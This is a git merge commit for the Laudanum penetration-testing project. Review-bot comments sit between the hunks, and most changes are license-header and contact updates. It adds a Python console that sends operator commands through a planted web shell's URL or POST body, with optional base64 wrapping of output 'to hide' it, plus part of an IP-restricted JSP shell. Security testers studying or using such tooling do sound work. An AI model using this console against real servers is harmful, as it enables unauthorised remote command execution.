Commit 144199c9 authored by Sophie Brun

Merge tag 'upstream/1.0+r36'

Upstream version 1.0+r36
parents c34d550f f624405e
...@@ -2,9 +2,18 @@ The Team ...@@ -2,9 +2,18 @@ The Team
======================================================== ========================================================
- Kevin Johnson - Kevin Johnson
- Project Lead - Project Lead
- @secureideas
- kevin@secureideas.com
- Tim Medin - Tim Medin
- Project Lead - Project Lead
- @timmedin
- tim@securitywhole.com
- John Sawyer
- Project Lead
- @johnhsawyer
- john@inguardians.com
- Justin Searle - Justin Searle
- Core Developer - Core Developer
...@@ -12,4 +21,4 @@ The Team ...@@ -12,4 +21,4 @@ The Team
Additional Coding Additional Coding
======================================================== ========================================================
- Robin Wood - Robin Wood
- Jason Gillam (Wordpress Plugin) - Jason Gillam (Wordpress Plugin)
\ No newline at end of file
Laudanum: Injectable Web Exploit Code v0.8 Laudanum: Injectable Web Exploit Code v1.0
By Kevin Johnson <kjohnson@secureideas.net> By Kevin Johnson <kjohnson@secureideas.com>
and the Laudanum Development Team and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net Project Website: http://laudanum.professionallyevil.com
Sourceforge Site: http://sourceforge.net/projects/laudanum Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
------------------------------------------------------------------------------- -------------------------------------------------------------------------------
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team ** Copyright (C) 2015 Kevin Johnson and the Laudanum Project Team
** **
** This program is free software; you can redistribute it and/or modify ** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by ** it under the terms of the GNU General Public License as published by
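Review bot: the author line now gives Kevin Johnson as `kjohnson@secureideas.com`, but the team list changed earlier in this commit adds `kevin@secureideas.com` for the same person. Confirm which address is intended and use it in both places.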
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to DNS on the system. ' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
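Review bot: the copyright line goes from "Copyright 2014 by Kevin Johnson and the Laudanum Team" to "Copyright 2015 by The Laudanum Team", which replaces the year instead of extending it and drops the named holder, while the notice carrying the v1.0 title earlier in this commit keeps "Kevin Johnson and the Laudanum Project Team". Use one holder string in both places, and a year range such as 2014-2015 if the earlier year still applies. The same comment applies to the identical header hunks in the other files.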
......
...@@ -8,19 +8,20 @@ ...@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to the file system. ' *** This file provides access to the file system.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -8,19 +8,20 @@ ...@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access as a proxy. ' *** This file provides access as a proxy.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** Updated and fixed by Robin Wood <Digininja> ' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@counterhack.com ' *** Updated and fixed by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -9,14 +9,15 @@ ...@@ -9,14 +9,15 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net> *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
......
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access on the system.
*** Sourced from http://www.bennadel.com/blog/726-coldfusion-application-cfc-tutorial-and-application-cfc-reference.htm
*** Modified by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfcomponent
displayname="Application"
output="true"
hint="Handle the application.">
<!--- Set up the application. --->
<cfset THIS.Name = "AppCFC" />
<cfset THIS.ApplicationTimeout = CreateTimeSpan( 0, 0, 1, 0 ) />
<cfset THIS.SessionManagement = true />
<cfset THIS.SetClientCookies = false />
<!--- Define the page request properties. --->
<cfsetting
requesttimeout="20"
showdebugoutput="false"
enablecfoutputonly="false"
/>
<cffunction
name="OnApplicationStart"
access="public"
returntype="boolean"
output="false"
hint="Fires when the application is first created.">
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnSessionStart"
access="public"
returntype="void"
output="false"
hint="Fires when the session is first created.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestStart"
access="public"
returntype="boolean"
output="false"
hint="Fires at first part of page processing.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnRequest"
access="public"
returntype="void"
output="true"
hint="Fires after pre page processing is complete.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Include the requested page. --->
<cfinclude template="#ARGUMENTS.TargetPage#" />
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestEnd"
access="public"
returntype="void"
output="true"
hint="Fires after the page processing is complete.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnSessionEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the session is terminated.">
<!--- Define arguments. --->
<cfargument
name="SessionScope"
type="struct"
required="true"
/>
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnApplicationEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the application is terminated.">
<!--- Define arguments. --->
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnError"
access="public"
returntype="void"
output="true"
hint="Fires when an exception occures that is not caught by a try/catch.">
<!--- Define arguments. --->
<cfargument
name="Exception"
type="any"
required="true"
/>
<cfargument
name="EventName"
type="string"
required="false"
default=""
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
</cfcomponent>
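Review bot: the header of this new component says "This file provides access to shell access on the system", but nothing in the component below does that: it sets application properties and defines the lifecycle handlers, with OnRequest including the requested page. Describe what the file is for in the package instead. The header also keeps `<kjohnson@secureideas.net` without the closing `>` (other files in this commit use `<kjohnson@secureideas.com>`), has a stray `^` after the GPL URL, and the OnError hint misspells "occurs" as "occures".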
...@@ -7,14 +7,15 @@ ...@@ -7,14 +7,15 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
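Review bot: the new Kevin Johnson line in this hunk still reads `<kjohnson@secureideas.net`, with the old domain and no closing `>`, while the same line in the other headers touched by this commit became `<kjohnson@secureideas.com>`. Bring this one in line with the rest.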
......
#!/usr/bin/env python
'''
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides a console for working with remote shells.
*** //TODO: Add the ability to strip out extra text so only shell output is shown
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
***************************************************************************** */
'''
import urllib2
import urllib
import base64
import re
origurl = None
origdata = None
replace = []
usebase64 = False
def sendrequest(url, data=None):
if data != None:
resp = urllib2.urlopen(url, data)
else:
resp = urllib2.urlopen(url)
html = resp.read()
resp.close()
if usebase64:
matches = re.findall('[A-Za-z0-9/+]+={0,2}', html)
for m in matches:
print base64.b64decode(m)
else:
print html
# TODO: update this to allow filtering before and after the command
def preparecmd(cmd):
global replace
global usebase64
for r in replace:
cmd = cmd.replace(r[0], r[1])
if usebase64:
cmd += ' | base64 -w 0'
cmd = urllib.quote(cmd)
return cmd
def dointeract():
global origurl
print "Type the commands to run on the remote server"
while True:
cmd = raw_input('> ')
if cmd in ['stop', 'quit', 'exit']:
break
cmd = preparecmd(cmd)
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
def main():
global origurl
global replace
global usebase64
global origdata
import argparse
parser = argparse.ArgumentParser(description='Easy remote shell.')
parser.add_argument('-i', '--interactive', help='interactive', dest='interactive', action='store_true', default=False)
parser.add_argument('-u', '--url', required=True, help='The url', metavar='URL', dest='url')
parser.add_argument('-d', '--data', help='data to send via post', metavar='DATA', dest='data')
parser.add_argument('-c', '--cmd', help='The command to execute (use ++ instead of - unless other override is defined)', metavar='COMMAND', dest='cmd', nargs='+')
parser.add_argument('-r', '--replace', nargs=2, action='append', help='Characters to replace', dest='replace')
# not encryption, don't pretend it is or use it thusly
parser.add_argument('-b', '--base64', help='Attempt to hide with base64 encoded (*Nix Only(', dest='base64', action='store_true', default=False)
args = parser.parse_args()
origurl = args.url
origdata = args.data if args.data else ''
replace = args.replace if args.replace else []
usebase64 = args.base64
if not args.interactive and args.cmd == None:
parser.print_help()
print 'argument -c/--cmd or -i/--interactive are required'
exit(0)
if args.cmd:
#check for the default overrite
if replace and [r[1] for r in replace if r[1]=='-']:
print 'override of - found, ignoring ++'
else:
replace.append(['++', '-'])
cmd = preparecmd(' '.join(args.cmd))
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
if args.interactive:
try:
import readline
except:
pass
dointeract()
if __name__ == '__main__':
main()
\ No newline at end of file
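Review bot: in main(), the branch that handles a missing -c/--cmd and -i/--interactive prints the help and then calls exit(0), so a usage error reports success to the calling shell; exit with a non-zero status, or call parser.error(), which prints the message and exits with status 2. Two smaller points in the same file: the `except:` around `import readline` swallows every exception where `except ImportError:` is what is meant, and the module docstring still ends with the C-style `*/` carried over from the other headers. The file also lacks a trailing newline.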
<%@ page import="java.util.*,java.io.*"%> <%@ page import="java.util.*,java.io.*"%>
<% <%
/*
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access to the system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
*****************************************************************************
*/
if (request.getRemoteAddr() != "4.4.4.4") { if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND) response.sendError(HttpServletResponse.SC_NOT_FOUND)
return; return;
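Review bot: the GPL notice added to this header gives the Free Software Foundation address as "Temple Place - Suite Boston, MA USA", with the street number, suite number and ZIP code missing; the ColdFusion component added in this commit has it as "59 Temple Place - Suite 330, Boston, MA 02111-1307, USA". Restore the full address here, and in the Python file, which has the same truncated text. The description line "provides access to shell access to the system" also wants rewording.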
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file provides access to DNS on the system. *** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com> *** Written by Tim Medin <tim@securitywhole.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system. *** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com> *** Written by Tim Medin <tim@securitywhole.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder *** 2013-12-28 Updated by Jason Gillam - fixed parent folder
*** ***
******************************************************************************** ********************************************************************************
......
<?php
/*
******************************************************************************